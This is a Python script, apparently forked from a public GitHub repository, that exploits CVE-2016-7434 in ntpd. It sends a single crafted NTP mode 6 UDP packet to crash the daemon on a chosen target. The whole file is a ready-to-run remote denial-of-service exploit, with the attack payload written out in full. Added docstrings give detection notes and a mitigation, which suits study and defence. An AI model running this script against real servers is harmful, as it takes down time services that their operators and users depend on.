forked from opsxcq/exploit-CVE-2016-7434
exploit.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
CVE-2016-7434 ntpd remote DOS by opsxcq (github.com/opsxcq/)
"""
from sys import argv, exit
import socket
from argparse import ArgumentParser
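def exploit(target, port):
    """Send the single CVE-2016-7434 proof-of-concept datagram to an ntpd.

    One UDP packet is sent to ``(target, port)`` and no reply is read, so
    this function cannot tell whether the daemon was affected; the caller
    has to check the service separately.

    Detection notes for defenders, read off the packet bytes below:
      * byte 0 (0x16) encodes NTP version 2, mode 6 (control message);
      * byte 1 (0x0a) is opcode 10, the MRU-list read request in ntpd;
      * the data field is ASCII text that starts with ``nonce, laddr=[]:``.
    Mitigation is the vendor fix for CVE-2016-7434, together with limiting
    which hosts may send mode 6 queries (for example a ``restrict ...
    noquery`` rule in ntp.conf).

    Args:
        target: Host name or IPv4 address of the ntpd under test.
        port: UDP port the daemon listens on.

    Raises:
        IOError: Propagated from the socket layer when the send fails.
    """
    # 12-byte mode 6 header followed by the request text. Kept exactly as
    # published so that signatures written against it stay valid.
    payload = "\x16\x0a\x00\x10\x00\x00\x00\x00\x00\x00\x00\x36\x6e\x6f\x6e\x63\x65\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x48\x72\x61\x67\x73\x3d\x33\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x32\x2c\x20\x6c\x61\x64\x64\x72\x3d\x5b\x5d\x3a\x57\x4f\x50\x00\x00"
    # Create a datagram socket (IPv4 only: AF_INET).
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.sendto(payload, (target, port))
    finally:
        # The original never closed the socket; release the descriptor on
        # both the success and the error path.
        sock.close()
    print("[+] Exploit sent, please test the target\n")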
if __name__ == "__main__":
    # Command-line front end: parse the target and port, then send the
    # single test datagram through exploit().
    parser = ArgumentParser(description="CVE-2016-7434 ntpd remote DOS")
    parser.add_argument("-t", "--target", required=True, help="Target's IP address")
    # NOTE(review): no default is declared for --port, so leaving it out
    # hands None to exploit().
    parser.add_argument("-p", "--port", required=False, type=int, help="port where ntpd is running")
    options = parser.parse_args()
    try:
        print("[*] Starting CVE-2016-7434 ntpd remote DOS")
        exploit(options.target, options.port)
    except IOError:
        # Socket-level failure: exit with the message as the exit status.
        exit("[!] Error sending packets")
    except KeyboardInterrupt:
        print("\n[*] Stopping the exploit")